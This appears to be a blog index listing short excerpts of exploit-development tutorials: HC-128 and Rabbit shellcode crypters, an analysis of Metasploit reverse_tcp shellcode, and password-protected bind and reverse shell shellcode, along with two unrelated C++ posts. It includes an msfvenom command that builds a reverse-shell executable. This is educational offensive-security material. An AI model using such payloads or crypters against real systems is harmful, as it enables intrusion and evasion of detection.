HC-128 Shellcode Crypter (x64)

In this post I will introduce custom shellcode crypter based on HC-128 cipher. Introduction to HC-128 cipher The HC-128 algorithm is a software-efficient, synchronous symmetric stream cipher designed by Hongjun Wu. The cipher makes use of a 128-bit key and 128-bit initialization vector. I will use HC-128 library developed in ECRYPT II project and simple stack execve shellcode. /bin/sh execve …

Analysis of Metasploit linux/x64/shell/reverse_tcp shellcode

linux/x64/shell/reverse_tcp staged shellcode generally consists of following steps Map 4096 bytes in process’ VAS memory Create and connect socket to remote address and port Wait for incoming data and save them into mapped memory Execute saved data Shellcode demonstration Create elf64 executable with msfvenom $ msfvenom -p linux/x64/shell/reverse_tcp -f elf -a x64 –platform linux LHOST= LPORT=5555 -o staged_reverse_tcp Set up …

Creating password protected TCP reverse shell shellcode (x64)

This blog post describes manual creating of password protected TCP reverse shellcode on Intel 64-bit architecture and Linux platform. If you have already read previous blog post how to create bind shell you will find this post very easy to follow as the progress is almost the same. We will start with following C code. Difference between bind and reverse …

Creating password protected TCP bind shell shellcode (x64)

This blog post describes manual creating of password protected TCP bind shell shellcode on Intel 64-bit architecture and Linux platform. We will start with following C code. Bind shell C code analysis Call to socket() creates a connection socket(1) and returns file descriptor(2) which identifies this socket later on. First argument selects the protocol family which will be used for …

Rabbit Shellcode Crypter

In this post I will introduce custom shellcode crypter based on Rabbit cipher. Introduction to Rabbit cipher Rabbit cipher is stream synchronous symmetric cipher using 128-bit key and 64-bit initialization vector. It was developed in 2003 by Martin Boesgaard, Mette Vesterager, Thomas Christensen and Erik Zenner. Source code was released in 2008. This cipher is used mainly in embedded devices, …

Working Directories and Build locations with Xcode 9 and C++

Introduction This post describes how Xcode manages Project Working Directories and what options do we have to setup it correctly. In the end you learn how to setup custom build locations for you compiled binaries. Definitions: Project Working Directory – is working directory associated with process created by executing built binary Project Directory – is directory with project source code …

Bitfinex REST API C++ client

I’ve just released simple C++ static library bfx-cpp-api which interfaces Bitfinex REST API (Websocket interface coming soon). Bfx-cpp-api uses libcurl and cryptopp library which must be installed before use. Check example code and don’t forget to link to libcurl and cryptopp when compiling. Before using authenticated endpoints be sure you have created API-secret-key file where first line is API access …